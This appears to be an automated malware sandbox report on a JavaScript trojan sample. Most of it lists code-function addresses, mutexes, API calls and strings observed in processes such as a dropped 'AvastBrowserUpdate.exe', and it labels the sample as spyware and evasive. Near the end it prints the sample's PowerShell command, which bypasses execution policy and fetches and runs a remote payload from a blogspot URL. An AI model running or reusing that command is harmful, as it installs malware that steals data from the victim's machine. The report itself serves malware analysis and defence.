                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DEE3C38_2_00000217CC6DEE3C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65CF2438_2_00000217CC65CF24
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC66178438_2_00000217CC661784
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC69A79038_2_00000217CC69A790
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC5F286C38_2_00000217CC5F286C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC63891038_2_00000217CC638910
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DE90838_2_00000217CC6DE908
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61D8B838_2_00000217CC61D8B8
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC5FF9A038_2_00000217CC5FF9A0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61198C38_2_00000217CC61198C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC645A0C38_2_00000217CC645A0C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DA9E438_2_00000217CC6DA9E4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC61136438_2_00000217CC611364
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65034438_2_00000217CC650344
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DF35438_2_00000217CC6DF354
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC60F40838_2_00000217CC60F408
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6EC52C38_2_00000217CC6EC52C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC60250038_2_00000217CC602500
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DE4EC38_2_00000217CC6DE4EC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC66D61038_2_00000217CC66D610
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65D66838_2_00000217CC65D668
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6456C038_2_00000217CC6456C0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6C16D438_2_00000217CC6C16D4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DDFB438_2_00000217CC6DDFB4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC646FB038_2_00000217CC646FB0
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC71F00838_2_00000217CC71F008
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6EC01038_2_00000217CC6EC010
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6DEFBC38_2_00000217CC6DEFBC
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6440B438_2_00000217CC6440B4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC64D05038_2_00000217CC64D050
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC5F105838_2_00000217CC5F1058
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65D10038_2_00000217CC65D100
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC64F0C438_2_00000217CC64F0C4
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC65D21038_2_00000217CC65D210
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeCode function: 38_2_00000217CC6CE1EC38_2_00000217CC6CE1EC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C1F4050_3_00000230185C1F40
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C028350_3_00000230185C0283
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C366C50_3_00000230185C366C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C272450_3_00000230185C2724
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00000230185C171650_3_00000230185C1716
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA1AD050_3_00007DF423DA1AD0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA147C50_3_00007DF423DA147C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA383850_3_00007DF423DA3838
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAAD5450_3_00007DF423DAAD54
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA5F6850_3_00007DF423DA5F68
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB2D3C50_3_00007DF423DB2D3C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DA5540
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DAFB14
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DAA918
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DAA328
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DABD10
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DA36F0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DAB0B4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DA769C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DB22B1
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DAF254
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DA323C
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DAC640
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DACC44
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DA59DC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DB07E8
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DB11C4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DAB5A0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exe Code function: 50_3_00007DF423DA9FAC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA59DC50_3_00007DF423DA59DC
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB07E850_3_00007DF423DB07E8
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB11C450_3_00007DF423DB11C4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DB11C450_3_00007DF423DB11C4
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DAB5A050_3_00007DF423DAB5A0
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeCode function: 50_3_00007DF423DA9FAC50_3_00007DF423DA9FAC
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23146652_3_7F231466
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23066F52_3_7F23066F
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F231E7A52_3_7F231E7A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_3_7F23243A52_3_7F23243A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FE313152_2_00FE3131
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00FF1F4D52_2_00FF1F4D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA3497752_2_6BA34977
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0295A52_2_6BA0295A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B93ACCE52_2_6B93ACCE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA2235C52_2_6BA2235C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA3019E52_2_6BA3019E
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA1E1F052_2_6BA1E1F0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA2212D52_2_6BA2212D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA1C7FA52_2_6BA1C7FA
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA2A6E052_2_6BA2A6E0
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9F466752_2_6B9F4667
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA225B952_2_6BA225B9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA21EFE52_2_6BA21EFE
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA073D952_2_6BA073D9
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9F37E452_2_6B9F37E4
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6B9F570452_2_6B9F5704
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_6BA0F55952_2_6BA0F559
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_00E1754952_2_00E17549
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F09EE4652_2_7F09EE46
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F09E48752_2_7F09E487
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E4F0052_2_7F0E4F00
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E3F8852_2_7F0E3F88
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0947BD52_2_7F0947BD
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E47B152_2_7F0E47B1
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E8FDA52_2_7F0E8FDA
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E4E8452_2_7F0E4E84
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0D468252_2_7F0D4682
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E569152_2_7F0E5691
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0DBD2052_2_7F0DBD20
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E1D7152_2_7F0E1D71
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0BFC0552_2_7F0BFC05
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F095C1152_2_7F095C11
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E2C9C52_2_7F0E2C9C
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E5B1A52_2_7F0E5B1A
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0BEB1D52_2_7F0BEB1D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E73D152_2_7F0E73D1
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0D2A0452_2_7F0D2A04
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C225D52_2_7F0C225D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0D3A9852_2_7F0D3A98
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0B9A9E52_2_7F0B9A9E
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C991052_2_7F0C9910
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0AD95152_2_7F0AD951
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C496D52_2_7F0C496D
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0C519052_2_7F0C5190
                      Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exeCode function: 52_2_7F0E61AF52_2_7F0E61AF
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: String function: 6B8F589B appears 178 times
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: String function: 6B8FDC24 appears 57 times
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: String function: 6B8F2FB3 appears 160 times
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: String function: 6BA19AF0 appears 45 times
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: String function: 6B8FDC4E appears 35 times
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: String function: 6B984DE0 appears 32 times
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: String function: 6B904396 appears 54 times
Source: 0a0#U00a0.js | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 3.2.powershell.exe.29a437d0000.0.raw.unpack, W3mIAMad8mK4ZyYb8CQ.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJS@79/158@18/15
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8FC9A2 GetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B8FF3BF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B907B61 OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B907EA9 OpenSCManagerW,GetLastError,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle
Source: C:\Windows\System32\svchost.exe | Code function: 27_2_00007DF4586B286C CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread
Source: C:\Program Files\Windows Media Player\wmlaunch.exe | Code function: 50_3_00007DF423DA147C CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_00FE6329 LoadResource,LockResource,SizeofResource
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B906F73 OpenSCManagerW,OpenServiceW,ChangeServiceConfig2W,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B907667 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Code function: 52_2_6B9075C3 StartServiceCtrlDispatcherW,GetLastError,WaitForSingleObject,CloseHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:304:WilStaging_02
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-d62aa157-c35a-233399-159d37406db3}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4112
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\GS-1-5-21-3425316567-2969588382-3778222414-1003{D19BAF17-7C87-467E-8D63-6C4B1C836373}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8664:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zapl50p.5yx.ps1
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Command line argument: kernel32.dll (52_2_00FE6A08)
Source: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe | Command line argument: DllEntry (52_2_00FE6A08)
Source: C:\Windows\SysWOW64\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exe | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: chrome.exe, 00000023.00000002.289669975648.0000013C179D0000.00000002.00000001.00040000.0000001B.sdmp | Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: chrome.exe, 00000023.00000002.289670217352.0000013C179F5000.00000002.00000001.00040000.0000001D.sdmp, chrome.exe, 00000023.00000002.289685817691.000060C4008C4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: svchost.exe, 0000001B.00000003.289571585197.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289982855373.0000018CD6550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.289988276869.00007DF4587E1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289981970918.0000018CD63D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289573048306.0000018CD6010000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000021.00000002.289638210527.0000022D0AE10000.00000040.80000000.00040000.00000000.sdmp, msedge.exe | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: AvastBrowserUpdate.exe | String found in binary or memory: https://www.google.com/support/installer/?
Source: AvastBrowserUpdate.exe | String found in binary or memory: Application update/install
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0a0#U00a0.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
